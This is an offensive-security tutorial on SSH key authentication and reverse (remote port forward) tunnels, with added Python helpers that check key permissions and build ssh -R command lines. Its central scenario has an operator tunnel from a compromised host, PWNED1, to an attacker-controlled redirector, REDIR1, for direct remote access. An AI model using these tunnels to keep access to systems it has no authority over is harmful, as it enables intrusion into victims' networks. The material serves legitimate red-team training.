Guide on SSH Tunnels and Proxies for Offense.
Getting Started with Secure Shell (SSH)
An SSH connection allows a user to connect remotely to a host and typically provides an interactive shell or command prompt through which commands can be executed. Both Windows and Linux can run SSH servers, and both ship a built-in SSH client. In this post, all references are to OpenSSH, the most common SSH client and server implementation.
Firewall
An SSH server should always be protected by firewall rules that allow connections only from specific, known hosts, because SSH grants remote control of the host. SSH servers reachable from the internet are especially exposed. Compromised offensive infrastructure would be valuable to an adversary; handing over access to it would be a serious failure.
Authentication
SSH credentials can be as simple as a username and password. SSH also lets users create a public and private key pair in place of a password. Keys provide strong, configurable asymmetric cryptography. The private key generated by the user must be protected as a secret; the public key is added to the target host's authorized_keys file.
As with a password, an attacker who recovers a private key can use it to access the server. For this reason, private keys should be encrypted with a passphrase, which acts as a second factor. With the ssh-keygen utility, you can create a 4096-bit RSA key pair with the following command:
ssh-keygen -t rsa -b 4096
By default, the private key is written to id_rsa and the public key to id_rsa.pub. To encrypt the private key, enter a passphrase when prompted. The private key file must be readable only by its owner and by no one else: the SSH client will ignore an identity file whose permissions allow other users to read it. On Linux hosts, the usual setting is mode 600, which lets the owner read and write the file while denying all access to other users and groups.
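The permission rule above is easy to get wrong after copying a key between hosts. The following Python script is an added example, not code from the original post: it reproduces the client-side check that OpenSSH applies to an identity file (no permission bits for group or others), demonstrates it on a constructed placeholder key file with mode 644, and then tightens the file to 600. The function names check_identity_file, protect_identity_file and demo are hypothetical.

```python
import os
import stat
import tempfile

# Added example (not from the original post): emulate the OpenSSH client's
# refusal to use a private key that group or others can read or write.
# Function names are hypothetical; the key file below is a constructed placeholder.


def check_identity_file(path: str) -> bool:
    """Return True if OpenSSH would accept `path` as an identity file.

    The client rejects a key whose mode grants any permission to group or
    others ("UNPROTECTED PRIVATE KEY FILE"), so 600 and 400 pass while
    644 or 660 fail.
    """
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & 0o077) == 0


def protect_identity_file(path: str) -> int:
    """Restrict the file to owner read/write (0600) and return the resulting mode."""
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo() -> dict:
    """Create a placeholder key with loose permissions, show it would be ignored,
    fix the permissions, and show it is then accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        key_path = os.path.join(tmp, "priv.key")
        with open(key_path, "w") as f:
            # Constructed placeholder content; not a real key.
            f.write("-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder)\n")
        os.chmod(key_path, 0o644)  # the common mistake: world-readable
        accepted_before = check_identity_file(key_path)
        mode_after = protect_identity_file(key_path)
        accepted_after = check_identity_file(key_path)
        return {
            "accepted_before": accepted_before,
            "mode_after": mode_after,
            "accepted_after": accepted_after,
        }


if __name__ == "__main__":
    print(demo())
```

Running the script prints a dictionary showing the 644 file rejected and the same file accepted once its mode is 0o600; the same check can be dropped into a deployment script to catch keys copied with loose permissions before a connection attempt fails.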
We will analyze the commands in sections throughout this post, and also break each command down into smaller parts to aid understanding. An image follows each set of commands to describe network connectivity and identify the host on which the commands should be run. LINUX1 represents a Linux workstation used by an operator, and REDIR1 a network-connected host that is part of the offensive operations infrastructure.
The following breakdown illustrates how to use an SSH private key to connect from LINUX1 to the server REDIR1 as the rastley user:

ssh: run the SSH client on LINUX1
-i /root/priv.key: use the private key stored at /root/priv.key as the identity file
rastley@REDIR1: connect to REDIR1 through SSH and log in as rastley

In the image below, you can see how to establish an SSH connection from LINUX1 to REDIR1

Private key and SSH
Remote Port Forward Tunnel
Connect to a compromised host in the client network via a redirector
Imagine that, during a breach assessment, an operator compromises a host called PWNED1 that is running an SSH server. The operator wants to SSH directly into the compromised host from the internet. To do so, create a remote port forward SSH tunnel, also known as a reverse tunnel, from PWNED1 to the operator's internet-accessible server REDIR1. Once the tunnel is set up, the operator can log in directly to the compromised host.
A remote port forward tunnel is created with the SSH client's -R flag. Its argument takes the form [bind_address:]port:host:hostport.
The bind address is the IP address of the interface on the remote host on which the tunnel listens. It must not be confused with the address of the SSH server that the client connects to for authentication. By default, OpenSSH binds to the host's loopback adapter, 127.0.0.1. For the tunnel to bind to a different address, GatewayPorts must be enabled in the SSH server's configuration file, /etc/ssh/sshd_config. With that option enabled, a bind address that is empty, 0.0.0.0, or * binds the tunnel to ALL interfaces. The problem is that the tunnel would then listen on an interface with a public IP address, so anyone on the internet could connect to it and reach the internal compromised host. GatewayPorts is off by default, in which case an empty bind address binds the tunnel to the loopback adapter only. Operators should therefore always specify the bind address explicitly rather than relying on the SSH server's configuration.
By default, localhost refers to the host's loopback adapter, but it can be made to resolve to any IP address by modifying the host's /etc/hosts file. This is why users should always use the interface IP address 127.0.0.1 rather than a DNS name that resolves to the loopback adapter.
The port argument specifies the port on the remote server's bind address interface to which the tunnel is bound. The port must be free, and if it is below 1024 the user account must have adequate permissions to bind a privileged port.
The host argument specifies the interface on the source host, where the command is executed, to which connections arriving through the tunnel are delivered. As before, it is best to explicitly specify 127.0.0.1 for the loopback adapter.
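The bind address, port and host rules above are the ones most often misread, so the following Python script, an added example and not code from the original post, parses an OpenSSH -R argument into its fields and attaches a warning for each choice the text cautions against: an omitted bind address (behaviour then depends on GatewayPorts), an empty, 0.0.0.0 or * bind address (all interfaces), the name localhost instead of 127.0.0.1, and a privileged port. It also assembles the resulting ssh command line for the PWNED1 to REDIR1 scenario. The names RemoteForward, parse_remote_forward and ssh_argv and the port 2222 are constructed for this illustration; bracketed IPv6 addresses are not handled.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Added example, not code from the original post. Parses an OpenSSH
# "-R [bind_address:]port:host:hostport" argument and reports the choices
# the text warns about before the tunnel is created. Names and the port
# numbers used in the demo are constructed for this illustration.

# Values sshd treats as "every interface" when GatewayPorts is enabled.
ALL_INTERFACES = {"", "0.0.0.0", "*"}


@dataclass
class RemoteForward:
    bind_address: Optional[str]  # None when the optional field was omitted entirely
    port: int                    # port the tunnel listens on, on the SSH server
    host: str                    # destination reached from the client's side
    hostport: int                # destination port on that host
    warnings: List[str] = field(default_factory=list)

    def spec(self) -> str:
        """Rebuild the argument exactly as it is passed to ssh -R."""
        head = f"{self.port}:{self.host}:{self.hostport}"
        return head if self.bind_address is None else f"{self.bind_address}:{head}"


def _parse_port(text: str, what: str) -> int:
    if not text.isdigit() or not 1 <= int(text) <= 65535:
        raise ValueError(f"{what} must be a number between 1 and 65535, got {text!r}")
    return int(text)


def parse_remote_forward(spec: str) -> RemoteForward:
    """Split the -R argument into its fields and attach security warnings.

    Bracketed IPv6 addresses are deliberately not handled here.
    """
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = None, *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"expected [bind_address:]port:host:hostport, got {spec!r}")

    fwd = RemoteForward(bind, _parse_port(port, "port"), host, _parse_port(hostport, "hostport"))

    if bind is None:
        fwd.warnings.append(
            "bind address omitted: the listening interface depends on the server's "
            "GatewayPorts setting; specify 127.0.0.1 explicitly")
    elif bind in ALL_INTERFACES:
        fwd.warnings.append(
            f"bind address {bind!r} selects all interfaces when GatewayPorts is enabled, "
            "exposing the tunnel on the server's public IP")
    elif bind == "localhost":
        fwd.warnings.append(
            "'localhost' is resolved through /etc/hosts and may not be the loopback "
            "adapter; use 127.0.0.1")
    if host == "localhost":
        fwd.warnings.append(
            "host 'localhost' is resolved through /etc/hosts on the client; use 127.0.0.1")
    if fwd.port < 1024:
        fwd.warnings.append(
            f"port {fwd.port} is privileged; the account on the server must be allowed to bind it")
    return fwd


def ssh_argv(fwd: RemoteForward, user: str, server: str, identity: Optional[str] = None) -> List[str]:
    """Assemble the ssh command line for this forward, as run on the source host."""
    argv = ["ssh"]
    if identity:
        argv += ["-i", identity]
    argv += ["-R", fwd.spec(), f"{user}@{server}"]
    return argv


if __name__ == "__main__":
    # Constructed scenario from the text: PWNED1 opens a reverse tunnel to REDIR1 so
    # that REDIR1's loopback port 2222 reaches PWNED1's SSH service on port 22.
    for candidate in ("127.0.0.1:2222:127.0.0.1:22", "2222:localhost:22", "*:443:127.0.0.1:22"):
        f = parse_remote_forward(candidate)
        print(" ".join(ssh_argv(f, "rastley", "REDIR1")))
        for w in f.warnings:
            print("  warning:", w)
```

Only the first candidate produces no warnings; it is the form the text recommends, with both the bind address and the host pinned to 127.0.0.1 and an unprivileged port on REDIR1.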
